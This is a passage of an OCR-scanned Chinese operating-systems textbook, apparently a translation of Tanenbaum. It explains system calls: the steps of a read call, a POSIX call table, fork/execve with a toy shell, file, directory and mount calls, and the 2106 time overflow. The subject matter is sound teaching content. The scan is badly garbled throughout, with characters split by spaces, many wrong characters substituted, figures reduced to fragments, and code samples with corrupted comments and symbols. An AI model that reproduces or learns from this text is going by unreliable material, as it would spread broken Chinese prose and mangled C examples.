11 上 引入 了 标准 硬盘 ，RK05 磁 盘 ， 容 量 为 2.5MB， 只 有 IBM RAMAC 一 
半 的 容量 ， 但 是 这 个 磁盘 的 直径 只 有 40 厘 米 ，5 厘 米 高 。 不 过 ， 其 原型 
也 只 有 单 层 目录 。 随 着 微型 计算 机 的 出 现 ，CP/M 开 始 成 为 操作 系统 的 
主流 ， 但 是 它 也 只 是 在 〈 软 ) 盘 上 支持 单 目录 。 





4. 虚 拟 内 存 





虚拟 内 存 (安排 在 第 3 章 中 讨论 ) ， 通 过 在 RAM 和 磁盘 中 反复 移动 
言 息 块 的 方式 ， 提 供 了 运行 比 机 器 物理 内 存 大 的 程序 能 力 。 虚 拟 内 存 也 
经 历 了 类 似 的 历程 ， 首 先 出 现在 大 型 机 上 ， 然 后 是 小 型 机 和 微型 机 。 虚 
拟 内 存 还 使 得 程序 可 以 在 运行 时 动态 地 链接 库 ， 而 不 是 必须 在 编译 时 链 
接 。MULTICS 是 第 一 个 可 以 做 到 这 点 的 系统 。 最 终 ， 这 个 思想 传播 到 
所 有 的 机 型 上 ， 现 在 广泛 用 于 多 数 UNIX 和 Windows 系 统 中 。 

















在 所 有 这 些 发 展 过程 中 ， 我 们 看 到 ， 在 一 种 环境 中 出 现 的 思想 ， 随 
独 环境 的 变化 被 抛 章 《汇编 语言 设计 ， 单 道 程 序 处 理 ， 单 层 目录 等 ) ， 
通常 在 十 年 之 后 ， 该 思想 在 男 一 种 环境 下 又 重 现 了 。 由 于 这 个 原因 ， 本 
书 中 ， 我 们 将 不 时 回顾 那些 在 今日 的 G 字 节 PC 机 中 过 时 的 思想 和 算法 ， 
因为 这 些 思 想 和 算法 可 能 会 在 嵌入 式 计算 机 和 智能 卡 中 再 现 。 











1.6 系统 调用 


我 们 已 经 看 到 操作 系统 具有 两 种 功能 : 为 用 户 程 序 提供 抽象 和 管理 
计算 机 资源 。 在 多 数 情 形 下 ， 用 户 程序 和 操作 系统 之 间 的 交互 处 理 的 是 
前 者 ， 例 如 ， 创 建 、 写 入 、 读 出 和 删除 文件 。 对 用 户 而 言 ， 资 源 管理 部 
分 主要 是 透明 和 上 自动 完成 的 。 这 样 ， 用 户 程 序 和 操作 系统 之 间 的 交互 主 
要 就 是 处 理 抽象 。 为 了 真正 理解 操作 系统 的 行为 ， 我 们 必须 仔细 地 分 析 
这 个 接口 。 接 口中 所 提供 的 调用 随 着 操作 系统 的 不 同 而 变化 (尽管 基于 
的 概念 是 类 似 的 ) 。 





这 样 我 们 不 得 不 在 如 下 的 可 能 方式 中 进行 选择 : O 含混 不 清 的 
一 般 性 叙述 〈“ 操 作 系统 提供 读 取 文件 的 系统 调用 ”) ; 〈2) 某 个 特定 
的 系统 “UNIX 提 供 一 个 有 三 个 参数 的 read 系 统 调用 : 一 个 参数 指定 文 
件 ， 一 个 说 明 数 据 应 存放 的 位 置 ， 男 一 个 说 明 应 读 出 多 少 个 字 市 ”) 。 








我 们 选择 后 一 种 方式 。 这 种 方式 需要 更 多 的 努力 ， 但 是 它 能 更 多 地 
洞察 操作 系统 具体 在 做 什么 。 尽 管 这 样 的 讨论 会 涉及 专门 的 
POSIX (International Standard 9945-1) ， 以 及 UNIX、System Vs 
BSD、Linux、MINIX3 等 ， 但 是 多 数 现代 操作 系统 都 有 实现 相同 功能 的 
系统 调用 ， 尽 管 它们 在 细节 上 差别 很 大 。 由 于 引发 系统 调用 的 实际 机 制 
是 非常 依赖 于 机 器 的 ， 而 且 必 须 用 汇编 代码 表达 ， 所 以 ， 通 过 提供 过 程 
库 使 C 程 序 中 能 够 使 用 系统 调用 ， 当 然 也 包括 其 他 语言 。 





记 住 下 列 事项 是 有 益 的 。 任 何 单 CPU 计 算 机 一 次 只 能 执行 一 条 指 
令 。 如 果 一 个 进程 正在 用 户 态 中 运行 一 个 用 户 程 序 ， 并 且 和 需要 一 个 系统 
服务 ， 比 如 从 一 个 文件 读数 据 ， 那 么 它 就 必须 执行 一 个 陷阱 或 系统 调用 
指令 ， 将 控制 转移 到 操作 系统 。 操 作 系统 接 独 通过 参数 检查 ， 找 出 所 需 
要 的 调用 进程 。 然 后 ， 它 执行 系统 调用 ， 并 把 控制 返回 给 在 系统 调用 后 
面 跟随 着 的 指令 。 在 茶 种 意义 上 ， 进 行 系统 调用 就 像 进行 一 个 特殊 的 过 
程 调用 ， 但 是 只 有 系统 调用 可 以 进入 内 核 ， 而 过 程 调用 则 不 能 。 


为 了 使 系统 调用 机 制 更 清晰 ， 让 我 们 简要 地 考察 read 系 统 调 用 。 如 
上 所 述 ， 它 有 三 个 参数 : 第 一 个 参数 指定 文件 ， 第 二 个 指 同 缓冲 区 ， 第 
三 个 说 明 要 读 出 的 字 市 数 。 几 乎 与 所 有 的 系统 调用 一 样 ， 它 的 调用 由 C 
程序 完成 ， 方 法 是 调用 一 个 与 该 系统 调用 名 称 相同 的 库 过 程 : read。 由 
C 程 序 进行 的 调用 可 有 如 下 形式 : 




















count=read (fd,buffer,nbytes); 








系统 调用 (以 及 库 过 程 》 在 count 中 返回 实际 读 出 的 字 节 数 。 这 个 
值 通 第 和 nbytes 相 同 ， 但 也 可 能 更 小 ， 例 如 ， 如 果 在 读 过程 中 过 到 了 文 
件 尾 的 情形 就 是 如 此 。 








如 果 系 统 调用 不 能 执行 ， 不 论 是 因为 无 效 的 参数 还 是 磁盘 错误 ， 
count 都 会 被 置 为 -1， 而 在 全 局 变量 errno 中 放 入 错误 号 。 程 序 应 该 经 常 检 
查 系 统 调用 的 结果 ， 以 了 解 是 否 出 错 。 





系统 调用 是 通过 一 系列 的 步骤 实现 的 。 为 了 更 清楚 地 说 明 这 个 概 
念 ， 考 察 上 面 的 read 调 用 。 在 准备 调用 这 个 实际 用 来 进行 read 系 统 调 用 
的 read 库 过 程 时 ， 调 用 程序 首先 把 参数 压 进 堆 栈 ， 如 图 1-17 中 步骤 1 一 步 
又 3 所 示 。 


地 址 
OxFFFFFFFF 


返回 到 调用 者 
陷入 内 核 库 过 程 read 
5| 把 用 于 read 的 代码 放 在 寄存 器 中 


用 户 空间 
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调用 read 的 
JKA &buffer 用 户 程序 
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TERR ; 系统 调用 
(操作 系统 ) ae 





图 1-17 完成 系统 调用 tead 的 11 个 步骤 


由 于 历史 的 原因 ，C 以 及 C++ 编译 器 使 用 逆序 〈 必 须 把 第 一 个 参数 
赋 给 printf〈 格 式 字 串 ) ， 放 在 堆栈 的 顶部 ) 。 第 一 个 和 第 三 个 参数 是 


值 调用 ， 但 是 第 二 个 参数 通过 引用 传递 ， 即 传递 的 是 缓冲 区 的 地 址 《由 
此 指示 ) ， 而 不 是 缓冲 区 的 内 容 。 接 着 是 对 库 过 程 的 实际 调用 (第 4 
步 ) 。 这 个 指令 是 用 来 调用 所 有 过 程 的 正常 过 程 调 用 指令 。 








在 可 能 是 由 汇编 语言 号 成 的 库 过 程 中 ， 一 般 把 系统 调用 的 编号 放 在 
操作 系统 所 期 望 的 地 方 ， 如 寄存 器 中 《第 5 步 ) 。 然 后 执行 一 个 TRAP 指 
令 ， 将 用 户 态 切换 到 内 核 态 ， 并 在 内 核 中 的 一 个 固定 地 址 开始 执行 〈 第 
6 步 ) 。TRAP 指 令 实际 上 与 过 程 调用 指令 相当 类 似 ， 它 们 后 面 都 跟随 一 
个 来 目 远 地 位 置 的 指令 ， 以 及 供 以 后 使 用 的 一 个 保存 在 栈 中 的 返回 地 
bk. 


然而 ，TRAP 指 令 与 过 程 指令 存在 两 个 方面 的 差别 。 首 先 ， 它 的 副 
作用 是 ， 切 换 到 内 核 态 。 而 过 程 调 用 指令 并 不 改变 模式 。 其 次 ， 不 像 给 
定 过 程 所 在 的 相对 或 绝对 地 址 那样 ，TRAP 指 令 不 能 跳 转 到 任意 地 址 
上 。 根 据 机 器 的 体系 结构 ， 或 者 跳 转 到 一 个 单 固定 地 址 上 ， 或 者 指令 中 
有 一 8 位 长 的 字段 ， 它 给 定 了 内 存 中 一 张 表 格 的 索引 ， 这 张 表 格 中 含有 
跳 转 地 址 。 


跟随 在 TRAP 指 令 后 的 内 核 代 码 开 始 检查 系统 调用 编号 ， 然 后 发 出 
正确 的 系统 调用 人 处理 命令 ， 这 通常 是 通过 一 张 由 系统 调用 编写 所 引用 
的 、 指 同系 统 调 用 处 理 器 的 指针 表 来 完成 《第 7 步 ) 。 此 时 ， 系 统 调用 
句柄 运行 “第 8 步 ) 。 一 旦 系统 调用 句柄 完成 其 工作 ， 控 制 可 能 会 在 跟 
随 TRAP 指 令 后 面 的 指令 中 返回 给 用 户 空 间 库 过 程 〈 第 9 步 ) 。 这 个 过 程 











接着 以 通 弟 的 过 程 调用 返回 的 方式 ， 返 回 到 用 户 程序 〈 第 10 步 ) 。 


为 了 完成 整个 工作 ， 用 户 程序 还 必须 清除 堆栈 ， 如 同 它 在 进行 任何 
过 程 调 用 之 后 一 样 〈 第 11 步 ) 。 假 设 堆栈 辐 下 增长 ， 如 经 第 所 做 的 那 
样 ， 编 译 后 的 代码 准确 地 增加 堆栈 指针 值 ， 以 便 清 除 调用 read 之 前 压 入 
的 参数 。 在 这 之 后 ， 原 来 的 程序 就 可 以 随意 执行 了 。 


在 前 面 第 9 步 中 ， 我 们 提 到 “控制 可 能 会 在 跟随 TRAP 指 令 后 面 的 指 
令 中 返回 给 用 户 空 间 库 过 程 >， 这 是 有 原因 的 。 系 统 调用 可 能 堵 蹇 调用 
者 ， 避 免 它 继续 执行 。 例 如 ， 如 有 果 试 图 读 键盘 ， 但 是 并 没有 任何 键入 ， 
那么 调用 者 就 必须 被 阻塞 。 在 这 种 情形 下 ， 操 作 系 统 会 得 看 是 否 有 其 他 
可 以 运行 的 进程 。 稍 后 ， 当 需要 的 输入 出 现时 ， 进 程 会 提醒 系统 注意 ， 
然后 步骤 9 一 步骤 11 会 接着 进行 








下 面 几 节 中 ， 我 们 将 考察 一 些 冲 用 的 POSIX 系 统 调用 ， 或 者 用 更 专 
业 的 说 法 ， 考 察 进行 这 些 系统 调用 的 库 过 程 。POSIX 大 约 有 100 个 过 程 
调用 ， 它 们 中 最 重要 的 过 程 调用 列 在 图 1-18 中 。 为 方便 起 见 ， 它 们 被 分 
成 4 类 。 我 们 用 文字 简要 地 叙述 其 作用 。 


进程 管理 








创建 与 父 进程 相同 的 子 进程 
等 待 一 个 子 进程 终止 

蔡 换 一 个 进程 的 核心 映像 
中 止 进程 执行 并 返回 状态 








pid = fork() 
pid = waitpid(pid, &statloc,options) 















s = execve(name, argv, environp) 








exit(status) 





文件 管理 
说 H 
fd = open(file, how, ...) 打开 一 个 文件 供 读 、 写 或 两 者 


s = close(fd) 关闭 一 个 打开 的 文件 


n = read(fd, buffer, nbytes) 把 数据 从 一 个 文件 读 到 缓冲 区 中 
n = write(fd, buffer, nbytes) 把 数据 从 缓冲 区 写 到 一 个 文件 中 


position = Iseek(fd, offset, whence) 移动 文件 指针 


s = stat(name, &buf) 取得 文件 的 状态 信息 

















目录 和 文件 系统 管理 


调 用 说 明 
s = mkdir(name, mode) 创建 一 个 新 目录 
K: 


一 个 新 目录 
PEAR 
s = link(name1, name2) 创建 一 个 新 目录 项 name2， 并 指向 name 1 





s = unlink(name) 删 去 一 个 目录 项 





s = mount(special, name, flag) 安装 一 个 文件 系统 
s = umount(special) 卸载 一 个 文件 系统 











这 


项 
调 用 说 明 
s = chdir(dirname) 改变 工作 目录 


iT 











6197011 STEN 
图 1-18 一 些 重要 的 POSIX 系 统 调用 。 若 出 错 则 返回 代码 $ 为 -1。 返 回 


代码 如 下 : pid 是 进程 的 d，fd 是 文件 描述 符 ,，n 是 字 节 数 ，position 是 在 


文件 中 的 偏 移 量 ， 而 seconds 是 流逝 时 间 。 和 参数 在 表 中 解释 


从 广义 上 看 ， 由 这 些 调用 押 提 供 的 服务 确定 了 多 数 操 作 系统 应 该 具 
有 的 功能 ， 而 在 个 人 计算 机 上 ， 资 源 管理 功能 是 较 弱 的 《人 至少 与 多 用 户 
的 大 型 机 相 比 较 是 这 样 ) 。 所 包含 的 服务 有 创建 与 终止 进程 ， 创 建 、 删 
除 、 读 出 和 写 入 文件 ， 目 录 管 理 以 及 完成 输入 输出 。 





有 必要 指出 ， 将 POSIX 过 程 映射 到 系统 调用 并 不 是 一 对 一 的 。 
POSIX 标 准 定义 了 构造 系统 所 必须 提供 的 一 套 过 程 ， 但 是 并 没有 规定 它 
们 是 系统 调用 ， 是 库 调 用 还 是 其 他 的 形式 。 如 果 不 通 过 系统 调用 就 可 以 
执行 一 个 过 程 〈 即 无 须 陷 入 内 核 ) ， 那 么 从 性 能 方面 考虑 ， 它 通常 会 在 
用 户 空间 中 完成 。 不 过 ， 多 数 POSIX 过 程 确实 进行 系统 调用 ， 通 常 是 一 
个 过 程 直接 映射 到 一 个 系统 调用 上 。 在 有 一 些 情形 下 ， 特 别 是 所 需要 的 
过 程 仅仅 是 某 个 调用 的 变 体 时 ， 此 时 一 个 系统 调用 会 对 应 寿 干 个 库 调 
用 。 








1.6.1 用 于 进程 管理 的 系统 调用 


在 图 1-18 中 的 第 一 组 调用 处 理 进程 管理 。 将 有 关 fork〈 派 生 ) 的 讨 
论 作 为 本 的 开始 是 较为 合适 的 。 在 UNIX 中 ，fork 是 惟一 可 以 在 POSIX 
创建 进程 的 途径 。 它 创建 一 个 原 有 进程 的 精确 副本 ， 包 括 所 有 的 文件 描 
述 符 ， 寄 存 器 等 全 部 内 容 。 在 fork 之 后 ， 原 有 的 进程 及 其 副本 〈 父 与 








F) 就 分 开 了 。 在 fork 时 ， 所 有 的 变量 具有 一 样 的 值 ， 虽 然 父 进程 的 数 
气 被 复制 用 以 创建 子 进 程 ， 但 是 其 中 一 个 的 后 续 变 化 并 不 会 影响 到 万 一 
个 。《〈 由 父 进程 和 子 进程 共享 的 程序 正文 ， 是 不 可 改变 的 。) fork 调 用 
返回 一 个 值 ， 在 子 进程 中 该 值 为 零 ， 并 且 等 于 子 进程 的 进程 标识 人 符 ， 或 
等 于 父 进程 中 的 PID 。 使 用 被 返回 的 PID， 就 可 以 在 两 个 进程 中 看 出 哪 
一 个 是 父 进程 ， 哪 一 个 是 子 进程 。 








多 数 情形 下 ， 在 fork 之 后 ， 子 进程 需要 执行 与 父 进 程 不 同 的 代码 。 
这 里 考虑 shell 的 情形 。 它 从 终端 读 取 命令 ， 创 建 一 个 子 进 程 ， 等 竺 该 子 
进程 执行 命令 ， 在 该 子 进程 终止 时 ， 读 入 下 一 条 命令 。 为 了 等 待 子 进程 
结束 ， 父 进程 执行 一 个 waitpid 系 统 调用 ， 它 只 是 等 等 ， 直 人 至 子 进程 终止 
《在 有 多 个 子 进 程 存 在 的 话 ， 则 直至 任何 一 个 子 进程 终止 ) 。waitpid 可 
以 等 竺 一 个 特定 的 子 进程 ， 或 者 通过 将 第 一 个 参数 设 为 -1 的 方式 ， 从 而 
等 待 任何 一 个 老 的 子 进程 。 在 waitpid 完 成 之 后 ， 将 把 第 二 个 参数 statloc 
所 指向 的 地 址 设置 为 子 进 程 的 退出 状态 “正常 或 异 第 终止 以 及 退出 
值 ) 。 有 各 种 可 使 用 的 选项 ， 它 们 由 第 三 个 参数 确定 。 








现在 考虑 shell 如 何 使 用 fork。 在 键入 一 条 命令 后 ，shell 创 建 一 个 新 
的 进程 。 这 个 子 进程 必须 执行 用 户 的 命令 。 通 过 使 用 execve 系 统 调 用 可 
以 实现 这 一 点 ， 这 个 系统 调用 会 引起 其 整个 核心 映像 被 一 个 文件 所 车 
代 ， 该 文件 由 第 一 个 参数 给 定 。 (实际 上 ， 该 系统 调用 上 自身 是 exec 系 统 
调用 ， 但 是 知 干 个 不 同 的 库 过 程 使 用 不 同 的 参数 和 稍 有 差别 的 名 称 调用 


该 系统 调用 。 在 这 里 ， 我 们 都 把 它们 视 为 系统 调用 。) 在 图 1-19 中 ， 用 
一 个 高 度 简化 的 shell 说 明 fork、waitpid 以 及 execve 的 使 用 。 


#define TRUE 1 


while (TRUE) { Ik 一 直 循环 下 去 */ 
type_prompt( ); 上 # 在 屏幕 上 显示 提示 符 */ 
read_command(command, parameters); /x 从 终端 读 取 输入 */ 


if (fork() != 0) { fe 派生 子 进程 类 
be SOARS */ 
waitpid(—1, &status, 0); pe 等 待 子 进程 退出 */ 
}else{ 
/*x FARIS */ 
execve(command, parameters, 0); be 执行 命令 */ 





图 1-19 一 条 shell (在 本 书 中 ，TRUE 都 被 定义 为 1) 


在 最 一 般 情 形 下 ，execve 有 三 个 参数 : 将 要 执行 的 文件 名 称 ， 一 个 
指 癌变 量 数组 的 指针 ， 以 及 一 个 指 问 环境 数组 的 指针 。 这 里 对 这 些 参 数 
做 一 个 简要 的 说 明 。 各 种 库 例 程 ， 包 括 execl、execV、execle 以 及 
execve， 可 以 允许 略 掉 参数 或 以 各 种 不 同 的 方式 给 定 。 在 本 书 中 ， 我 们 
在 所 有 涉及 的 地 方 使 用 exec 描 述 系 统 调用 。 


下 面 考虑 诸如 











cp filel file2 








的 命令 ， 该 命令 将 flel 复 制 到 file2。 在 shell 创 建 进程 之 后 ， 该 子 进 


程 定 位 和 执行 文件 cp， 并 将 源 文件 名 和 目标 文件 名 传递 给 它 。 
cp 主 程序 〈 以 及 多 数 其 他 C 程 序 的 主 程序 ) 都 有 声明 


main (argc, argvrenvp) 





其 中 argc 是 该 命令 行内 有 关 参 数 数 目的 计数 器 ， 包 括 程序 名 称 。 例 
如 ， 上 面 的 例子 中 ，argc 为 3。 


第 二 个 参数 argv 是 一 个 指 回 数 组 的 指针 。 访 数组 的 元 素 瑰 指 回 该 命 
令 行 第 i 个 字 串 的 指针 。 在 本 例 中 ，argv[0] 指 疝 字 串 “cp”argv[1] 指 癌 字 


符 串 “filel1”，argv[2] 指 问 字 符 串 “file2”。 


main 的 第 三 个 参数 envp 指 回环 境 的 一 个 指针 ， 该 环境 是 一 个 数组 ， 
含有 name=value 的 赋值 形式 ， 用 以 将 诸如 终端 类 型 以 及 根 目录 等 信息 传 
送 给 程序 。 还 有 供 程 序 可 以 调用 的 库 过 程 ， 用 来 取得 环境 变量 ， 这 些 变 
量 通 常用 来 确定 用 户 希 望 如 何 完成 特定 的 任务 〈 例 如 ， 使 用 默认 打印 
HO 。 在 图 1-19 中 ， 没 有 环境 参数 传递 给 也 进程 ， 所 以 execve 的 第 三 个 


参数 为 零 


如 果 读 者 认为 exec 过 于 复杂 ， 那 么 也 不 要 失望 。 这 是 在 POSIX 的 全 
部 《语义 上 ) 系统 调用 中 最 复杂 的 一 个 ， 其 他 的 都 非常 简单 。 作 为 一 个 
简单 例子 ， 考 虑 exit， 这 是 在 进程 完成 执行 后 应 执行 的 系统 调用 。 这 个 
系统 调用 有 一 个 参数 ， 退 出 状态 (0 至 255) ， 该 参数 通过 waitpid 系 统 调 


用 中 的 statloc 返 回 给 父 进 程 。 


在 UNIX 中 的 进程 将 其 存储 空间 划分 为 三 段 : 正文 段 〈 如 程序 代 
码 ) 、 数 据 段 (如 变量 ) 以 及 堆栈 段 。 数 据 段 向 上 增长 而 堆栈 向 下 增 
长 ， 如 图 1-20 所 示 。 来 在 中 间 的 是 未 使 用 的 地 址 空间 。 堆 栈 在 需要 时 日 
动 地 向 中 间 增 长 ， 不 过 数据 段 的 扩展 是 显 式 地 通过 系统 调用 brk 进 行 
的 ， 在 数据 段 扩 充 后 ， 该 系统 调用 指定 一 个 新 地 址 。 但 是 ， 这 个 调用 不 
是 POSIX 标 准 中 定义 的 调用 ， 对 于 存储 絮 的 动态 分 配 ， 我 们 至 励 程 序 员 
使 用 malloc 库 过 程 ， 而 malloc 的 内 部 实现 则 不 是 一 个 适合 标准 化 的 主 
题 ， 因 为 几乎 没有 程序 员 直 接 使 用 它 ， 我 们 有 理由 怀疑 ， 会 有 什么 人 注 
意 到 brk 实 际 不 是 属于 POSIX 的 。 





地 址 (十 六 进 制 》 
FFFF 





图 1-20 进程 有 三 段 : 正文 段 、 数 据 段 和 堆栈 段 


16.2 用 于 文件 管理 的 系统 调用 


许多 系统 调用 与 文件 系统 有 关 。 本 小 节 讨 论 在 单个 文件 上 的 操作 ， 
1.6.3 节 将 讨论 与 目录 和 整个 文件 系统 有 关 的 内 容 。 


要 读 写 一 个 文件 ， 先 要 使 用 open 打 开 该 文件 。 这 个 系统 调用 通过 绝 
对 路 径 名 或 指向 工作 目录 的 相对 路 径 名 指定 要 打开 文件 的 名 称 ， 而 代码 
O_RDONLY、O_WRONLY 或 O RDWR 的 含义 分 别 是 读 、 写 或 两 者 。 
为 了 创建 一 个 新 文件 ， 使 用 O_CREAT 参 数 。 然 后 可 使 用 返回 的 文件 描 
述 符 进 行 读 写 操作 。 接 着 ， 可 以 用 close 关 闭 文件 ， 这 个 调用 使 得 该 文件 
描述 符 在 后 续 的 open 中 被 再 次 使 用 。 











毫 无 疑问 ， 最 常用 的 调用 是 read 和 write。 我 们 在 前 面 已 经 讨论 过 
read。write 具 有 与 read 相 同 的 参数 。 


尽管 多 数 程序 频 索 地 读 写 文件 ， 但 是 仍 有 一 些 应 用 程序 需要 能 够 随 
机 访问 一 个 文件 的 任意 部 分 。 与 每 个 文件 相关 的 是 一 个 指向 文件 当前 位 
置 的 指针 。 在 顺序 读 《〈 写 ) 时 ， 该 指针 通常 指向 要 读 出 〈 写 入 ) 的 下 一 
个 字 节 。lseek 调 用 可 以 改变 该 位 置 指针 的 值 ， 这 样 后 续 的 read 或 write 调 
用 就 可 以 在 文件 的 任何 地 方 开始 。 











lseek 有 三 个 参数 : 第 一 个 是 文件 的 描述 符 ， 第 二 个 是 文件 位 置 ， 第 








个 说 明 该 文件 位 置 是 相对 于 文件 起 始 位 置 、 当 前 位 置 ， 还 是 文件 的 结 
尾 。 在 修改 了 指针 之 后 ，lseek 所 返回 的 值 是 文件 中 的 绝对 位 置 。 


UNIX 为 每 个 文件 保存 了 该 文件 的 类 型 〈 普 通 文 件 、 特 殊 文 件 、 目 
录 等 ) ， 大 小 ， 最 后 修改 时 间 以 及 其 他 信息 。 程 序 可 以 通过 stat 系 统 调 
用 查看 这 些 信息 。 第 一 个 参数 指定 了 要 被 检查 的 文件 ， 第 二 个 参数 是 一 
个 指针 ， 该 指针 指向 用 来 存放 这 些 信息 的 结构 。 对 于 一 个 打开 的 文件 而 


a 


言 ，fstat 调 用 完成 同样 的 工作 。 











1.6.3 用 于 目录 管理 的 系统 调用 





本 节 我 们 讨论 与 目录 或 整个 文件 系统 有 关 的 某 些 系统 调用 ， 而 不 是 
1.6.2 节 中 与 一 个 特定 文件 有 关 的 系统 调用 。mkdir 和 rmdir 分 别 用 于 创建 
和 删除 空 目 录 。 下 一 个 调用 是 link。 它 的 作用 是 允许 同一 个 文件 以 两 个 
或 多 个 名 称 出 现 ， 多 数 情形 下 是 在 不 同 的 目录 中 这 样 做 。 它 的 典型 应 用 
是 ， 在 同一 个 开发 团队 中 允许 若干 个 成 员 共 享 一 个 共同 的 文件 ， 他 们 之 
中 的 每 个 人 都 在 自己 的 目录 中 有 该 文件 ， 但 可 能 采用 的 是 不 同 的 名 称 。 
共享 一 个 文件 ， 与 每 个 团队 成 员 都 有 一 个 私 用 副本 并 不 是 同一 件 事 ， 因 
为 共享 文件 意味 着 ， 任 何 成 员 所 做 的 修改 都 立即 为 其 他 成 员 所 见 
有 一 个 文件 存在 。 而 在 复制 了 一 个 文件 的 多 个 副本 之 后 ， 对 其 中 一 个 副 
本 所 进行 的 修改 并 不 会 影响 到 其 他 的 副本 。 























只 


为 了 考察 link 是 如 何 工作 的 ， 考 虑 图 1-21a 中 的 情形 。 有 两 个 用 户 ， 
ast 和 jim， 每 个 用 户 都 有 一 些 文 件 的 目录 。 知 ast 现 在 执行 一 个 含有 系统 
调用 的 程序 





link("/usr/jim/memo", "usr/ast/note") ; 





在 jim 目 录 中 的 文件 memo， 以 文件 名 note 进 入 ast 的 目录 。 之 
后 ，/usr/jim/memo 和 /usr/ast/note 都 引用 相同 的 文件 。 顺 便 提 及 ， 用 户 是 
将 目录 保存 在 /usr、/user、/home 还 是 其 他 地 方 ， 则 完全 取决 于 本 地 系统 


管理 员 的 决定 。 





理解 link 是 如 何 工 作 的 也 许 有 助 于 读者 看 清 其 作用 。 在 UNIX 中 ， 
个 文件 都 有 惟一 的 编号 ， 即 编号 ， 用 以 标识 文件 。 该 -编号 是 对 -节点 
表格 的 一 个 引用 ， 它 们 一 一 对 应 ， 说 明 该 文件 的 拥有 者 ， 磁 盘 块 的 位 置 
等 。 一 个 目录 就 是 包含 了 (i- 编 号 ，ASCII 名 称 ) 对 集合 的 一 个 文件 。 
在 UNIX 的 第 一 个 版 本 中 ， 每 个 目录 项 有 16 个 字 节 一 一 2 个 字 节 用 于 i- 编 
14 个 字 节 用 于 名 称 。 现 在 为 了 支持 长 文件 名 ,采用 了 更 复杂 的 结 
， 但 是 ， 在 概念 上 ， 目 录 仍 然 是 (编号 ，ASCII 名 称 ) 对 的 一 个 集 
。 在 图 1-21 中 ，mail 为 i- 编 号 16， 等 等 。link 所 做 的 只 是 利用 某 个 已 有 
文件 的 i- 编 号， 创建 一 个 新 目录 项 (也 许 用 一 个 新 名 称 ) 。 在 图 1-21b 中 
两 个 目录 项 有 相同 的 i- 编 号 (70，〉， 从 而 指向 同一 个 文件 。 如 果 其 中 某 
一 个 文件 后 来 被 移 走 了 ， 使 用 unlink 系 统 调 用 ， 可 以 保留 另 一 个 。 如 果 
两 个 都 被 移 走 了 ，UNIX 00 看 到 尚 存在 的 文件 没有 目录 项 (i- 节 点 中 的 
一 个 域 记 录 着 指向 该 文件 的 目录 项 ) ， 就 会 把 该 文件 从 磁盘 中 移 去 。 








os do 


o> 





/usr/ast /usr/jim /usr/ast /usr/jim 





a) b) 


图 1-21 a) 将 /ust/jim/memo 链 接 到 ast 目 录 之 前 的 两 个 目录 ; 了 bb) 链接 之 


后 的 两 个 目录 


正如 我 们 已 经 叙述 过 的 ，mount 系 统 调用 允许 将 两 个 文件 系统 合并 
成 为 一 个 。 通 常 的 情形 是 ， 在 硬盘 上 的 根 文件 系统 含有 常用 命令 的 二 进 
制 ( 可 执行 版 和 其 他 常用 的 文件 。 用 户 可 在 CD-ROM 了 驱动 器 中 插入 包 
含有 需要 读 入 文件 的 CD-ROM 松 。 


通过 执行 mount 系 统 调用 ， 可 以 将 一 个 CD-ROM 文 件 系 统 添 加 a 到 根 
文件 系统 中 ， 如 图 1-22 所 示 。 完 成 安装 操作 的 典型 C 语 句 为 


mount ("/dev/fd0","/mnt", 0); 


E 


bin dev lib mnt usr AN 
b) 


a) 





图 1-22 安装 前 的 文件 系统 ; bb) 安装 后 的 文件 系统 


这 里 ， 第 一 个 参数 是 驱动 器 0 的 块 特殊 文件 名 称 ， 第 二 个 参数 是 要 
被 安装 在 树 中 的 位 置 ， 第 三 个 参数 说 明 将 要 安 闭 的 文件 系统 是 可 读 写 的 


还 是 只 读 的 。 


在 mount 调 用 之 后 ， 驱 动 器 0 上 的 文件 可 以 使 用 从 根 目 录 开 始 的 路 径 





或 工作 目录 路 径 ， 而 不 用 考虑 文件 在 哪个 驱动 器 上 上。 事实 上 ， 第 二 个 、 
第 三 个 以 及 第 四 个 驱动 占 也 可 安装 在 树 上 的 任何 地 方 。mount 调 用 使 得 
把 可 移动 介质 都 集中 到 一 个 文件 层次 中 成 为 可 能 ， 而 不 用 考虑 文件 在 哪 
个 驱动 右上。 尽管 这 是 个 CD-ROM 的 例子 ， 但 是 也 可 以 用 同样 的 方法 安 
闭 便 盘 或 者 硬盘 的 一 部 分 〈 利 称 为 分 区 或 次 级 设备 ) ， 外 部 硬盘 和 USB 
盘 也 一 样 。 当 不 再 需要 一 个 文件 系统 时 ， 可 以 用 umount 系 统 调 用 外 载 





var 


1.6.4 各 种 系统 调用 


有 各 种 的 系统 调用 。 这 里 介绍 系统 调用 中 的 一 部 分 。chdir 调 用 改变 
当前 的 工作 目录 。 在 调用 








chdir("/usr/ast/test"); 


之 后 ， 打 开 xyz 文 件 ， 会 打开 /usr/ast/test/xyz。 工 作 目 录 的 概念 消除 
了 总 是 键入 《长 ) 绝对 路 径 名 的 需要 。 





在 UNIX 中 ， 每 个 文件 有 一 个 保护 模式 。 该 模式 包括 针对 所 有 者 、 
组 和 其 他 用 户 的 读 - 写 -执行 位 。chmod 系 统 调用 可 以 改变 文件 的 模式 。 
例如 ， 要 使 一 个 文件 对 除了 所 有 者 之 外 的 用 户 只 读 ， 可 以 执行 


chmod ("file", 0644); 








kill it Val AA HEAD PRAP ERSA H. AAEE 
换 一 个 特定 的 信号 ， 那 么 ， 在 信号 到 来 时 ， 运 行 一 个 信号 处 理 程序 。 如 
果 该 进程 没有 准备 好 ， 那 么 信号 的 到 来 会 杀 挥 该 进程 (此 调用 名 称 的 由 
HE) 0 





POSIX 定 义 了 若干 处 理 时 间 的 过 程 。 例 如 ，time 以 秒 为 单位 返回 当 
前 时 间 ，0 对 应 着 1970 年 1 月 1 日 午夜 〈 从 此 日 开始 ， 没 有 结束 ) 。 在 一 








台 32 位 字 的 计算 机 中 ，time 的 最 大 值 是 2%* -1 秒 〈 假 设 是 无 符号 整数 ) 。 
这 个 数字 对 应 136 年 多 一 点 。 所 以 在 2106 年 ，32 位 的 UNIX 系 统 会 发 狂 ， 
与 在 2000 年 造成 对 世界 计算 机 严重 破坏 的 知名 的 Y2K 问 题 是 类 似 的 。 如 
果 读 者 现在 有 32 位 UNIX 系 统 ， 建 议 在 2106 年 之 前 的 某 时 刻 更 换 为 64 位 
的 系统 。 


1.6.5 Windows Win32 API 


到 目前 为 止 ， 我 们 主要 讨论 的 是 UNIX 系 统 。 现 在 简要 地 考察 
Windows。Windows 和 UNIX 的 主要 差别 在 于 编程 方式 。 一 个 UNIX 程 序 
